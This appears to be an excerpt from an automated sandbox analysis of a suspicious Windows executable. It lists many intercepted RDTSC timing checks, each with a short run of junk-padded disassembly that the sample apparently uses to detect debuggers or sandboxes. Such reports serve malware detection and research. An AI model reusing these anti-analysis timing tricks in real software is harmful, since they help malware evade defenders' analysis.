Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11C8C08 second address: 11C8C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11C902E second address: 11C904F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF2E5514DE6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FF2E5514DF5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11C904F second address: 11C9070 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FF2E55A2C26h 0x00000009 jmp 00007FF2E55A2C36h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11C9070 second address: 11C907D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FF2E5514DECh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11C9209 second address: 11C9217 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF2E55A2C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11C9217 second address: 11C921B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11C921B second address: 11C9221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11C935C second address: 11C9360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11C951F second address: 11C9540 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF2E55A2C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF2E55A2C35h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11CF3E4 second address: 11CF3E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11CF3E8 second address: 11CF40E instructions: 0x00000000 rdtsc 0x00000002 js 00007FF2E55A2C3Dh 0x00000008 jmp 00007FF2E55A2C37h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11CF40E second address: 11CF419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF2E5514DE6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11CDD2F second address: 11CDD41 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF2E55A2C2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11CDD41 second address: 11CDD47 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11CDEB1 second address: 11CDEB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11CDFE9 second address: 11CDFEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11CE2E3 second address: 11CE302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E55A2C39h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11CE302 second address: 11CE306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11CE44F second address: 11CE461 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF2E55A2C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007FF2E55A2C26h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1177ABB second address: 1177ABF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1177BB1 second address: 1177BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1177BB6 second address: 1177BD6 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF2E5514DE8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF2E5514DF0h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11CF0CF second address: 11CF0DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11CF0DB second address: 11CF0E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11360A2 second address: 11360BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C38h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11D6420 second address: 11D6424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11D6424 second address: 11D6445 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11D6445 second address: 11D6449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11D6449 second address: 11D644F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11D6719 second address: 11D671F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11D671F second address: 11D672F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11D672F second address: 11D6737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11D6737 second address: 11D673C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11D7046 second address: 11D7056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF2E5514DE6h 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11D7384 second address: 11D7390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF2E55A2C2Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11E0BE9 second address: 11E0BF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FF2E5514DE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11E0059 second address: 11E009B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FF2E55A2C28h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007FF2E55A2C38h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 jmp 00007FF2E55A2C33h 0x0000001b popad 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11E009B second address: 11E009F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11E01C3 second address: 11E01C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11E01C9 second address: 11E01D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11E0336 second address: 11E033E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11E079D second address: 11E07A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11E07A3 second address: 11E07B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007FF2E55A2C32h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11E07B6 second address: 11E07C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FF2E5514DE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11E07C0 second address: 11E07E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FF2E55A2C37h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jl 00007FF2E55A2C26h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11E863F second address: 11E8653 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF2E5514DEAh 0x00000008 jl 00007FF2E5514DECh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11E6D66 second address: 11E6D79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E55A2C2Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11E6D79 second address: 11E6D7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11E6D7D second address: 11E6DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2E55A2C39h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11E74A3 second address: 11E74A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11E74A8 second address: 11E74B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11E74B2 second address: 11E74DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FF2E5514DFFh 0x0000000f jmp 00007FF2E5514DF9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11E74DA second address: 11E74F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E55A2C36h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11E74F6 second address: 11E74FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11F0D9F second address: 11F0DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1201D64 second address: 1201D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1201D68 second address: 1201D6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 120177F second address: 12017A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jp 00007FF2E5514DE8h 0x0000000b pushad 0x0000000c popad 0x0000000d jo 00007FF2E5514DE8h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 je 00007FF2E5514DE6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 12017A0 second address: 12017B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF2E55A2C26h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FF2E55A2C26h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 12017B3 second address: 12017C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 12017C3 second address: 12017C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 12017C8 second address: 12017CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 12017CE second address: 12017E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FF2E55A2C32h 0x0000000b jbe 00007FF2E55A2C26h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 120191E second address: 1201937 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FF2E5514DEFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1201937 second address: 1201951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2E55A2C36h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1201951 second address: 120196C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 121469F second address: 12146A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 12146A3 second address: 12146AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 12146AD second address: 12146F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007FF2E55A2C26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e jo 00007FF2E55A2C26h 0x00000014 pop ecx 0x00000015 jmp 00007FF2E55A2C37h 0x0000001a pushad 0x0000001b jmp 00007FF2E55A2C38h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1218C6A second address: 1218C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2E5514DF8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1218E2B second address: 1218E2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1218E2F second address: 1218E35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1218E35 second address: 1218E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FF2E55A2C2Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1218E43 second address: 1218E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jo 00007FF2E5514DE6h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1218E57 second address: 1218E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1219121 second address: 1219125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1219125 second address: 121912B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 121912B second address: 121912F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 121928A second address: 12192A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 12192A9 second address: 12192D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DEFh 0x00000007 jmp 00007FF2E5514DEFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 12192D1 second address: 12192D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 12192D5 second address: 12192D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1219418 second address: 1219441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF2E55A2C31h 0x0000000c jmp 00007FF2E55A2C31h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1219441 second address: 121944B instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF2E5514DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 121944B second address: 1219450 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1219450 second address: 121945A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 121945A second address: 1219460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1130EB6 second address: 1130EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF2E5514DE6h 0x0000000a pop edx 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1219E98 second address: 1219EB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Ah 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FF2E55A2C30h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 121DD49 second address: 121DD5D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF2E5514DE6h 0x00000008 jnc 00007FF2E5514DE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 121DD5D second address: 121DD63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 121DD63 second address: 121DD6D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF2E5514DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 121DD6D second address: 121DD89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C34h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1233580 second address: 123359D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007FF2E5514DF5h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 123359D second address: 12335CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FF2E55A2C26h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007FF2E55A2C30h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pushad 0x00000019 popad 0x0000001a pop esi 0x0000001b push eax 0x0000001c push edx 0x0000001d jg 00007FF2E55A2C26h 0x00000023 push eax 0x00000024 pop eax 0x00000025 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 12335CD second address: 12335D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 12335D3 second address: 12335E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C30h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 12335E8 second address: 12335F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
